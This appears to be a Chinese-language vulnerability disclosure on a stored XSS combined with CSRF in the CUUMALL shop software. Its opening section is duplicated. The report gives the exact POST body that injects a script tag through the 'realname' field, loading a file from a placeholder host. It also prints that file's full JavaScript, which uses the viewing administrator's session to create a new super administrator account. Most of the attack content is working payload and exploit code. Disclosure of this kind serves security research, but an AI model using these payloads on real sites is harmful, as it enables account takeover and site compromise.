### 简要描述: CUUMALL 存储型xss+csrf添加超级管理员 ### 详细说明: 注册用户后,然后在完善用户资料后,然后进行重新编辑如图所示: [<img src="https://images.seebug.org/upload/201406/15152230df9c53d1e7d3fe8a3a77ff80c21b282c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15152230df9c53d1e7d3fe8a3a77ff80c21b282c.png) 这里我们抓一次包,然后重放post数据为: shen=%E6%B9%96%E5%8C%97&shi=%E8%8D%86%E5%B7%9E%E5%B8%82&qu=%E6%B2%99%E5%B8%82%E5%8C%BA&uid=529&realname="><script src=http://xxx/xss_csrf_shell.js></script><sp&email=atest%40qq.com&more=sdasdada&youbian=712000&tel=2294568226&mob=15802996564&qq=3154678&ww=22365&imageField.x=80&imageField.y=25&__hash__=542651f0fd15535c418aaa9ebdc11646 如图所示: [<img src="https://images.seebug.org/upload/201406/151524071287f61ad62d8b84189e2cc333dff28c.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/151524071287f61ad62d8b84189e2cc333dff28c.png) xss_csrf_shell.js内容如下: ``` function ajax(){ var request = false;...
### 简要描述: CUUMALL 存储型xss+csrf添加超级管理员 ### 详细说明: 注册用户后,然后在完善用户资料后,然后进行重新编辑如图所示: [<img src="https://images.seebug.org/upload/201406/15152230df9c53d1e7d3fe8a3a77ff80c21b282c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15152230df9c53d1e7d3fe8a3a77ff80c21b282c.png) 这里我们抓一次包,然后重放post数据为: shen=%E6%B9%96%E5%8C%97&shi=%E8%8D%86%E5%B7%9E%E5%B8%82&qu=%E6%B2%99%E5%B8%82%E5%8C%BA&uid=529&realname="><script src=http://xxx/xss_csrf_shell.js></script><sp&email=atest%40qq.com&more=sdasdada&youbian=712000&tel=2294568226&mob=15802996564&qq=3154678&ww=22365&imageField.x=80&imageField.y=25&__hash__=542651f0fd15535c418aaa9ebdc11646 如图所示: [<img src="https://images.seebug.org/upload/201406/151524071287f61ad62d8b84189e2cc333dff28c.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/151524071287f61ad62d8b84189e2cc333dff28c.png) xss_csrf_shell.js内容如下: ``` function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; }var _x = ajax(); postgo(); function postgo() { src="http://demo.cuumall.com/index.php/admin/adminmgr/addadminuser"; data="username=test4&password=111111&password2=111111&admingroup=14&email=test4%40163.com&imageField.x=73&imageField.y=26&__hash__=0bdd686e67897ac78b07c171571da709"; xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false); cookie = document.cookie; if(_m=="POST"){ _x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.setRequestHeader("Cookie",cookie); } _x.send(_a); return _x.responseText; } ``` 如上内容所示我们添加一个test4管理员,当管理员查看用户信息时候: [<img src="https://images.seebug.org/upload/201406/151527593b6f510c3fab2ee0a844c81293e5df1d.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/151527593b6f510c3fab2ee0a844c81293e5df1d.png) 然后我们到管理员权限,下面的管理员列表可以看到: [<img src="https://images.seebug.org/upload/201406/15152908d92716a29c6138198421d7183cb67480.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15152908d92716a29c6138198421d7183cb67480.png) ok!!!!!!!!!!!!! ### 漏洞证明:
